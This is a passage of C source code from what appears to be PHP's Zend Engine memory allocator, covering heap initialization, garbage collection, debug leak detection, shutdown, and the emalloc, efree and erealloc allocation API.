static void zend_mm_free_huge(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t size;
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE) == 0, "zend_mm_heap corrupted");
size = zend_mm_del_huge_block(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
zend_mm_chunk_free(heap, ptr, size);
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= size;
#endif
#if ZEND_MM_STAT
heap->size -= size;
#endif
}
/******************/
/* Initialization */
/******************/
static zend_mm_heap *zend_mm_init(void)
{
zend_mm_chunk *chunk = (zend_mm_chunk*)zend_mm_chunk_alloc_int(ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
zend_mm_heap *heap;
if (UNEXPECTED(chunk == NULL)) {
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
heap = &chunk->heap_slot;
chunk->heap = heap;
chunk->next = chunk;
chunk->prev = chunk;
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
chunk->num = 0;
chunk->free_map[0] = (Z_L(1) << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->main_chunk = chunk;
heap->cached_chunks = NULL;
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
heap->cached_chunks_count = 0;
heap->avg_chunks_count = 1.0;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = 0;
heap->peak = 0;
#endif
#if ZEND_MM_LIMIT
heap->limit = (Z_L(-1) >> Z_L(1));
heap->overflow = 0;
#endif
#if ZEND_MM_CUSTOM
heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_NONE;
#endif
#if ZEND_MM_STORAGE
heap->storage = NULL;
#endif
heap->huge_list = NULL;
return heap;
}
ZEND_API size_t zend_mm_gc(zend_mm_heap *heap)
{
zend_mm_free_slot *p, **q;
zend_mm_chunk *chunk;
size_t page_offset;
int page_num;
zend_mm_page_info info;
int i, has_free_pages, free_counter;
size_t collected = 0;
#if ZEND_MM_CUSTOM
if (heap->use_custom_heap) {
return 0;
}
#endif
for (i = 0; i < ZEND_MM_BINS; i++) {
has_free_pages = 0;
p = heap->free_slot[i];
while (p != NULL) {
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(p, ZEND_MM_CHUNK_SIZE);
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
page_offset = ZEND_MM_ALIGNED_OFFSET(p, ZEND_MM_CHUNK_SIZE);
ZEND_ASSERT(page_offset != 0);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
if (info & ZEND_MM_IS_LRUN) {
page_num -= ZEND_MM_NRUN_OFFSET(info);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
ZEND_ASSERT(!(info & ZEND_MM_IS_LRUN));
}
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(info) == i);
free_counter = ZEND_MM_SRUN_FREE_COUNTER(info) + 1;
if (free_counter == bin_elements[i]) {
has_free_pages = 1;
}
chunk->map[page_num] = ZEND_MM_SRUN_EX(i, free_counter);;
p = p->next_free_slot;
}
if (!has_free_pages) {
continue;
}
q = &heap->free_slot[i];
p = *q;
while (p != NULL) {
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(p, ZEND_MM_CHUNK_SIZE);
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
page_offset = ZEND_MM_ALIGNED_OFFSET(p, ZEND_MM_CHUNK_SIZE);
ZEND_ASSERT(page_offset != 0);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
if (info & ZEND_MM_IS_LRUN) {
page_num -= ZEND_MM_NRUN_OFFSET(info);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
ZEND_ASSERT(!(info & ZEND_MM_IS_LRUN));
}
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(info) == i);
if (ZEND_MM_SRUN_FREE_COUNTER(info) == bin_elements[i]) {
/* remove from cache */
p = p->next_free_slot;;
*q = p;
} else {
q = &p->next_free_slot;
p = *q;
}
}
}
chunk = heap->main_chunk;
do {
i = ZEND_MM_FIRST_PAGE;
while (i < chunk->free_tail) {
if (zend_mm_bitset_is_set(chunk->free_map, i)) {
info = chunk->map[i];
if (info & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(info);
int pages_count = bin_pages[bin_num];
if (ZEND_MM_SRUN_FREE_COUNTER(info) == bin_elements[bin_num]) {
/* all elemens are free */
zend_mm_free_pages_ex(heap, chunk, i, pages_count, 0);
collected += pages_count;
} else {
/* reset counter */
chunk->map[i] = ZEND_MM_SRUN(bin_num);
}
i += bin_pages[bin_num];
} else /* if (info & ZEND_MM_IS_LRUN) */ {
i += ZEND_MM_LRUN_PAGES(info);
}
} else {
i++;
}
}
if (chunk->free_pages == ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE) {
zend_mm_chunk *next_chunk = chunk->next;
zend_mm_delete_chunk(heap, chunk);
chunk = next_chunk;
} else {
chunk = chunk->next;
}
} while (chunk != heap->main_chunk);
return collected * ZEND_MM_PAGE_SIZE;
}
#if ZEND_DEBUG
/******************/
/* Leak detection */
/******************/
static zend_long zend_mm_find_leaks_small(zend_mm_chunk *p, int i, int j, zend_leak_info *leak)
{
int empty = 1;
zend_long count = 0;
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] * (j + 1) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
while (j < bin_elements[bin_num]) {
if (dbg->size != 0) {
if (dbg->filename == leak->filename && dbg->lineno == leak->lineno) {
count++;
dbg->size = 0;
dbg->filename = NULL;
dbg->lineno = 0;
} else {
empty = 0;
}
}
j++;
dbg = (zend_mm_debug_info*)((char*)dbg + bin_data_size[bin_num]);
}
if (empty) {
zend_mm_bitset_reset_range(p->free_map, i, bin_pages[bin_num]);
}
return count;
}
static zend_long zend_mm_find_leaks(zend_mm_heap *heap, zend_mm_chunk *p, int i, zend_leak_info *leak)
{
zend_long count = 0;
do {
while (i < p->free_tail) {
if (zend_mm_bitset_is_set(p->free_map, i)) {
if (p->map[i] & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
count += zend_mm_find_leaks_small(p, i, 0, leak);
i += bin_pages[bin_num];
} else /* if (p->map[i] & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * (i + pages_count) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
if (dbg->filename == leak->filename && dbg->lineno == leak->lineno) {
count++;
}
zend_mm_bitset_reset_range(p->free_map, i, pages_count);
i += pages_count;
}
} else {
i++;
}
}
p = p->next;
} while (p != heap->main_chunk);
return count;
}
static zend_long zend_mm_find_leaks_huge(zend_mm_heap *heap, zend_mm_huge_list *list)
{
zend_long count = 0;
zend_mm_huge_list *prev = list;
zend_mm_huge_list *p = list->next;
while (p) {
if (p->dbg.filename == list->dbg.filename && p->dbg.lineno == list->dbg.lineno) {
prev->next = p->next;
zend_mm_chunk_free(heap, p->ptr, p->size);
zend_mm_free_heap(heap, p, NULL, 0, NULL, 0);
count++;
} else {
prev = p;
}
p = prev->next;
}
return count;
}
static void zend_mm_check_leaks(zend_mm_heap *heap)
{
zend_mm_huge_list *list;
zend_mm_chunk *p;
zend_leak_info leak;
zend_long repeated = 0;
uint32_t total = 0;
int i, j;
/* find leaked huge blocks and free them */
list = heap->huge_list;
while (list) {
zend_mm_huge_list *q = list;
leak.addr = list->ptr;
leak.size = list->dbg.size;
leak.filename = list->dbg.filename;
leak.orig_filename = list->dbg.orig_filename;
leak.lineno = list->dbg.lineno;
leak.orig_lineno = list->dbg.orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
repeated = zend_mm_find_leaks_huge(heap, list);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
heap->huge_list = list = list->next;
zend_mm_chunk_free(heap, q->ptr, q->size);
zend_mm_free_heap(heap, q, NULL, 0, NULL, 0);
}
/* for each chunk */
p = heap->main_chunk;
do {
i = ZEND_MM_FIRST_PAGE;
while (i < p->free_tail) {
if (zend_mm_bitset_is_set(p->free_map, i)) {
if (p->map[i] & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
j = 0;
while (j < bin_elements[bin_num]) {
if (dbg->size != 0) {
leak.addr = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] * j);
leak.size = dbg->size;
leak.filename = dbg->filename;
leak.orig_filename = dbg->orig_filename;
leak.lineno = dbg->lineno;
leak.orig_lineno = dbg->orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
dbg->size = 0;
dbg->filename = NULL;
dbg->lineno = 0;
repeated = zend_mm_find_leaks_small(p, i, j + 1, &leak) +
zend_mm_find_leaks(heap, p, i + bin_pages[bin_num], &leak);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
}
dbg = (zend_mm_debug_info*)((char*)dbg + bin_data_size[bin_num]);
j++;
}
i += bin_pages[bin_num];
} else /* if (p->map[i] & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * (i + pages_count) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
leak.addr = (void*)((char*)p + ZEND_MM_PAGE_SIZE * i);
leak.size = dbg->size;
leak.filename = dbg->filename;
leak.orig_filename = dbg->orig_filename;
leak.lineno = dbg->lineno;
leak.orig_lineno = dbg->orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
zend_mm_bitset_reset_range(p->free_map, i, pages_count);
repeated = zend_mm_find_leaks(heap, p, i + pages_count, &leak);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
i += pages_count;
}
} else {
i++;
}
}
p = p->next;
} while (p != heap->main_chunk);
if (total) {
zend_message_dispatcher(ZMSG_MEMORY_LEAKS_GRAND_TOTAL, &total);
}
}
#endif
void zend_mm_shutdown(zend_mm_heap *heap, int full, int silent)
{
zend_mm_chunk *p;
zend_mm_huge_list *list;
#if ZEND_MM_CUSTOM
if (heap->use_custom_heap) {
if (full) {
if (ZEND_DEBUG && heap->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
heap->custom_heap.debug._free(heap ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC);
} else {
heap->custom_heap.std._free(heap);
}
}
return;
}
#endif
#if ZEND_DEBUG
if (!silent) {
zend_mm_check_leaks(heap);
}
#endif
/* free huge blocks */
list = heap->huge_list;
heap->huge_list = NULL;
while (list) {
zend_mm_huge_list *q = list;
list = list->next;
zend_mm_chunk_free(heap, q->ptr, q->size);
}
/* move all chunks except of the first one into the cache */
p = heap->main_chunk->next;
while (p != heap->main_chunk) {
zend_mm_chunk *q = p->next;
p->next = heap->cached_chunks;
heap->cached_chunks = p;
p = q;
heap->chunks_count--;
heap->cached_chunks_count++;
}
if (full) {
/* free all cached chunks */
while (heap->cached_chunks) {
p = heap->cached_chunks;
heap->cached_chunks = p->next;
zend_mm_chunk_free(heap, p, ZEND_MM_CHUNK_SIZE);
}
/* free the first chunk */
zend_mm_chunk_free(heap, heap->main_chunk, ZEND_MM_CHUNK_SIZE);
} else {
zend_mm_heap old_heap;
/* free some cached chunks to keep average count */
heap->avg_chunks_count = (heap->avg_chunks_count + (double)heap->peak_chunks_count) / 2.0;
while ((double)heap->cached_chunks_count + 0.9 > heap->avg_chunks_count &&
heap->cached_chunks) {
p = heap->cached_chunks;
heap->cached_chunks = p->next;
zend_mm_chunk_free(heap, p, ZEND_MM_CHUNK_SIZE);
heap->cached_chunks_count--;
}
/* clear cached chunks */
p = heap->cached_chunks;
while (p != NULL) {
zend_mm_chunk *q = p->next;
memset(p, 0, sizeof(zend_mm_chunk));
p->next = q;
p = q;
}
/* reinitialize the first chunk and heap */
old_heap = *heap;
p = heap->main_chunk;
memset(p, 0, ZEND_MM_FIRST_PAGE * ZEND_MM_PAGE_SIZE);
*heap = old_heap;
memset(heap->free_slot, 0, sizeof(heap->free_slot));
heap->main_chunk = p;
p->heap = &p->heap_slot;
p->next = p;
p->prev = p;
p->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
p->free_tail = ZEND_MM_FIRST_PAGE;
p->free_map[0] = (1L << ZEND_MM_FIRST_PAGE) - 1;
p->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = heap->peak = 0;
#endif
}
}
/**************/
/* PUBLIC API */
/**************/
ZEND_API void* ZEND_FASTCALL _zend_mm_alloc(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void ZEND_FASTCALL _zend_mm_free(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_free_heap(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
void* ZEND_FASTCALL _zend_mm_realloc(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_realloc_heap(heap, ptr, size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
void* ZEND_FASTCALL _zend_mm_realloc2(zend_mm_heap *heap, void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_realloc_heap(heap, ptr, size, copy_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API size_t ZEND_FASTCALL _zend_mm_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
/**********************/
/* Allocation Manager */
/**********************/
typedef struct _zend_alloc_globals {
zend_mm_heap *mm_heap;
} zend_alloc_globals;
#ifdef ZTS
static int alloc_globals_id;
# define AG(v) ZEND_TSRMG(alloc_globals_id, zend_alloc_globals *, v)
#else
# define AG(v) (alloc_globals.v)
static zend_alloc_globals alloc_globals;
#endif
ZEND_API int is_zend_mm(void)
{
#if ZEND_MM_CUSTOM
return !AG(mm_heap)->use_custom_heap;
#else
return 1;
#endif
}
#if !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__))
#undef _emalloc
#if ZEND_MM_CUSTOM
# define ZEND_MM_CUSTOM_ALLOCATOR(size) do { \
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { \
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { \
return AG(mm_heap)->custom_heap.debug._malloc(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
} else { \
return AG(mm_heap)->custom_heap.std._malloc(size); \
} \
} \
} while (0)
# define ZEND_MM_CUSTOM_DEALLOCATOR(ptr) do { \
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { \
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { \
AG(mm_heap)->custom_heap.debug._free(ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
} else { \
AG(mm_heap)->custom_heap.std._free(ptr); \
} \
return; \
} \
} while (0)
#else
# define ZEND_MM_CUSTOM_ALLOCATOR(size)
# define ZEND_MM_CUSTOM_DEALLOCATOR(ptr)
#endif
# define _ZEND_BIN_ALLOCATOR(_num, _size, _elements, _pages, x, y) \
ZEND_API void* ZEND_FASTCALL _emalloc_ ## _size(void) { \
ZEND_MM_CUSTOM_ALLOCATOR(_size); \
return zend_mm_alloc_small(AG(mm_heap), _size, _num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
}
ZEND_MM_BINS_INFO(_ZEND_BIN_ALLOCATOR, x, y)
ZEND_API void* ZEND_FASTCALL _emalloc_large(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
ZEND_MM_CUSTOM_ALLOCATOR(size);
return zend_mm_alloc_large(AG(mm_heap), size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _emalloc_huge(size_t size)
{
ZEND_MM_CUSTOM_ALLOCATOR(size);
return zend_mm_alloc_huge(AG(mm_heap), size);
}
#if ZEND_DEBUG
# define _ZEND_BIN_FREE(_num, _size, _elements, _pages, x, y) \
ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
{ \
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE); \
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
int page_num = page_offset / ZEND_MM_PAGE_SIZE; \
ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
ZEND_ASSERT(chunk->map[page_num] & ZEND_MM_IS_SRUN); \
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(chunk->map[page_num]) == _num); \
zend_mm_free_small(AG(mm_heap), ptr, _num); \
} \
}
#else
# define _ZEND_BIN_FREE(_num, _size, _elements, _pages, x, y) \
ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
{ \
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
zend_mm_free_small(AG(mm_heap), ptr, _num); \
} \
}
#endif
ZEND_MM_BINS_INFO(_ZEND_BIN_FREE, x, y)
ZEND_API void ZEND_FASTCALL _efree_large(void *ptr, size_t size)
{
ZEND_MM_CUSTOM_DEALLOCATOR(ptr);
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = page_offset / ZEND_MM_PAGE_SIZE;
int pages_count = ZEND_MM_ALIGNED_SIZE_EX(size, ZEND_MM_PAGE_SIZE) / ZEND_MM_PAGE_SIZE;
ZEND_MM_CHECK(chunk->heap == AG(mm_heap) && ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
ZEND_ASSERT(chunk->map[page_num] & ZEND_MM_IS_LRUN);
ZEND_ASSERT(ZEND_MM_LRUN_PAGES(chunk->map[page_num]) == pages_count);
zend_mm_free_large(AG(mm_heap), chunk, page_num, pages_count);
}
}
ZEND_API void ZEND_FASTCALL _efree_huge(void *ptr, size_t size)
{
ZEND_MM_CUSTOM_DEALLOCATOR(ptr);
zend_mm_free_huge(AG(mm_heap), ptr);
}
#endif
ZEND_API void* ZEND_FASTCALL _emalloc(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_CUSTOM
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._malloc(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._malloc(size);
}
}
#endif
return zend_mm_alloc_heap(AG(mm_heap), size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void ZEND_FASTCALL _efree(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_CUSTOM
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
AG(mm_heap)->custom_heap.debug._free(ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
AG(mm_heap)->custom_heap.std._free(ptr);
}
return;
}
#endif
zend_mm_free_heap(AG(mm_heap), ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._realloc(ptr, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._realloc(ptr, size);
}
}
return zend_mm_realloc_heap(AG(mm_heap), ptr, size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _erealloc2(void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._realloc(ptr, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._realloc(ptr, size);
}
}
return zend_mm_realloc_heap(AG(mm_heap), ptr, size, copy_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API size_t ZEND_FASTCALL _zend_mem_block_size(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
return 0;
}
return zend_mm_size(AG(mm_heap), ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
int overflow;
size_t ret = zend_safe_address(nmemb, size, offset, &overflow);
if (UNEXPECTED(overflow)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
return 0;
}
return ret;
}
ZEND_API void* ZEND_FASTCALL _safe_emalloc(size_t nmemb, size_t size, size_t offset ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return emalloc_rel(safe_address(nmemb, size, offset));
}
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
return pemalloc(safe_address(nmemb, size, offset), 1);
}
ZEND_API void* ZEND_FASTCALL _safe_erealloc(void *ptr, size_t nmemb, size_t size, size_t offset ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return erealloc_rel(ptr, safe_address(nmemb, size, offset));
}
ZEND_API void* ZEND_FASTCALL _safe_realloc(void *ptr, size_t nmemb, size_t size, size_t offset)
{
return perealloc(ptr, safe_address(nmemb, size, offset), 1);
}
ZEND_API void* ZEND_FASTCALL _ecalloc(size_t nmemb, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
void *p;
p = _safe_emalloc(nmemb, size, 0 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memset(p, 0, size * nmemb);
return p;
}
ZEND_API char* ZEND_FASTCALL _estrdup(const char *s ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t length;
char *p;
length = strlen(s);
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) _emalloc(length + 1 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memcpy(p, s, length+1);
return p;
}
ZEND_API char* ZEND_FASTCALL _estrndup(const char *s, size_t length ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
char *p;
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) _emalloc(length + 1 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memcpy(p, s, length);
p[length] = 0;
return p;
}
ZEND_API char* ZEND_FASTCALL zend_strndup(const char *s, size_t length)
{
char *p;
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) malloc(length + 1);
if (UNEXPECTED(p == NULL)) {
return p;
}
if (EXPECTED(length)) {
memcpy(p, s, length);
}
p[length] = 0;
return p;
}
ZEND_API int zend_set_memory_limit(size_t memory_limit)
{
#if ZEND_MM_LIMIT
AG(mm_heap)->limit = (memory_limit >= ZEND_MM_CHUNK_SIZE) ? memory_limit : ZEND_MM_CHUNK_SIZE;
#endif
return SUCCESS;
}
ZEND_API size_t zend_memory_usage(int real_usage)
{
#if ZEND_MM_STAT
if (real_usage) {
return AG(mm_heap)->real_size;
} else {
size_t usage = AG(mm_heap)->size;
return usage;
}
#endif
return 0;
}
ZEND_API size_t zend_memory_peak_usage(int real_usage)
{
#if ZEND_MM_STAT
if (real_usage) {
return AG(mm_heap)->real_peak;
} else {
return AG(mm_heap)->peak;
}
#endif
return 0;
}
ZEND_API void shutdown_memory_manager(int silent, int full_shutdown)
{
zend_mm_shutdown(AG(mm_heap), full_shutdown, silent);
}
static void alloc_globals_ctor(zend_alloc_globals *alloc_globals)
{
#if ZEND_MM_CUSTOM
char *tmp = getenv("USE_ZEND_ALLOC");
if (tmp && !zend_atoi(tmp, 0)) {
alloc_globals->mm_heap = malloc(sizeof(zend_mm_heap));
memset(alloc_globals->mm_heap, 0, sizeof(zend_mm_heap));
alloc_globals->mm_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_STD;
alloc_globals->mm_heap->custom_heap.std._malloc = malloc;
alloc_globals->mm_heap->custom_heap.std._free = free;
alloc_globals->mm_heap->custom_heap.std._realloc = realloc;
return;
}
#endif
#ifdef MAP_HUGETLB
tmp = getenv("USE_ZEND_ALLOC_HUGE_PAGES");
if (tmp && zend_atoi(tmp, 0)) {
zend_mm_use_huge_pages = 1;
}
#endif
ZEND_TSRMLS_CACHE_UPDATE();
alloc_globals->mm_heap = zend_mm_init();
}
#ifdef ZTS
static void alloc_globals_dtor(zend_alloc_globals *alloc_globals)
{
